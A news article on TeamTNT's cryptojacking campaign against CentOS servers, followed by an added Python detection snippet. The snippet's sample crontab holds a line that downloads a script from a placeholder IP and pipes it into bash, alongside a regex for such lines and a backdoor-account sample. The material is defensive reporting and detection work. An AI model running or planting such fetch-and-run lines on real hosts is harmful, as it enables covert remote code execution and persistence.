TeamTNT’s new Cryptojacking campaign targets CentOS servers with rootkits

By Admin, September 19, 2024, 3 Mins Read
September 19, 2024Ravi LakshmananCryptojacking / Cloud Security
The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting virtual private server (VPS) infrastructure running the CentOS operating system.

“The initial access was accomplished through a brute-force Secure Shell (SSH) attack on the victim’s assets, during which the threat actor downloaded a malicious script,” Group-IB researchers Vito Alfano and Nam Le Phuong said in Wednesday’s report.

The malicious script, the Singapore-based cybersecurity firm noted, is responsible for disabling security features, deleting logs, halting cryptocurrency mining processes, and preventing recovery.

The attack chain ultimately paves the way for the deployment of the Diamorphine rootkit, which hides malicious processes and establishes persistent remote access to the compromised host.

The campaign has been attributed to TeamTNT with moderate confidence, based on similarities in the observed tactics, techniques and procedures (TTPs).


TeamTNT was first observed in the wild in 2019, carrying out illicit cryptocurrency mining by infiltrating cloud and container environments. Although the threat actor announced a "clean exit" in November 2021, public reports have documented several campaigns run by the group since September 2022.

The recent activity associated with the group takes the form of a shell script that first checks whether the host has already been infected by other cryptojacking operations, then weakens the machine's defences by disabling SELinux, AppArmor and the firewall.

Figure: changes made to the SSH service

“The script looks for a daemon associated with Alibaba’s cloud provider called aliyun.service,” the researchers said. “When it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to remove the service.”

In addition to stopping all competing cryptocurrency mining processes, the script runs a series of commands to remove traces left by other miners, stop container processes, and delete images deployed alongside any coin miners.

The script also establishes persistence by setting up cron jobs that download a shell script every 30 minutes from a remote server (65.108.48(.)150) and by modifying the "/root/.ssh/authorized_keys" file to add a backdoor account.

“It locks down the system by changing file attributes, creating a backdoor root user, and erasing the command history to hide its activity,” the researchers noted. “A threat actor leaves nothing to chance; indeed, the script implements various changes to the configuration of the SSH service and the firewall.”
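As an added defensive illustration, not code from the article or from Group-IB, the following Python snippet checks constructed samples of the host artefacts the report describes (a cron job fetching a remote script, an unapproved key in /root/.ssh/authorized_keys, a second UID-0 account, and an immutable attribute set on a file) and returns each finding. The IP address 203.0.113.10, the key blobs, the account names and the approved-key baseline are placeholders, not indicators from the campaign.

```python
import re

# Constructed sample artefacts (not taken from the report) mimicking the
# persistence traits it describes: a cron job pulling a remote script every
# 30 minutes, an unapproved key in /root/.ssh/authorized_keys, a second UID-0
# account, and an immutable attribute set on a file the attacker wants kept.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * curl -s http://203.0.113.10/update.sh | bash
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderAdminKey admin@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPlaceholderUnknownKey unknown@unknown
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sysadmin:x:1000:1000::/home/sysadmin:/bin/bash
backup:x:0:0::/root:/bin/bash
"""
SAMPLE_LSATTR = """\
--------------e------- /etc/ssh/sshd_config
----i---------e------- /root/.ssh/authorized_keys
"""
# Approved baseline of "type blob" pairs; a placeholder, not a real key.
KNOWN_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderAdminKey"}
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def remote_exec_cron(crontab):
    """Cron lines that download a script and pipe it straight into a shell."""
    return [ln for ln in crontab.splitlines() if REMOTE_EXEC.search(ln)]

def unapproved_keys(authorized_keys, known):
    """Comment of each key whose 'type blob' pair is not in the approved baseline."""
    hits = []
    for ln in authorized_keys.splitlines():
        parts = ln.split()
        if len(parts) >= 2 and " ".join(parts[:2]) not in known:
            hits.append(parts[2] if len(parts) > 2 else parts[0])
    return hits

def extra_uid0_accounts(passwd):
    """Accounts other than root that carry UID 0 (a backdoor root user)."""
    return [f[0] for f in (ln.split(":") for ln in passwd.splitlines())
            if len(f) >= 3 and f[2] == "0" and f[0] != "root"]

def immutable_files(lsattr_output):
    """Paths from `lsattr` output whose flag field carries the immutable 'i' bit."""
    return [path for flags, _, path in (ln.partition(" ") for ln in lsattr_output.splitlines())
            if "i" in flags]
```

On a live host the same functions can be fed the output of `crontab -l`, the contents of /root/.ssh/authorized_keys and /etc/passwd, and `lsattr` over the files of interest.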
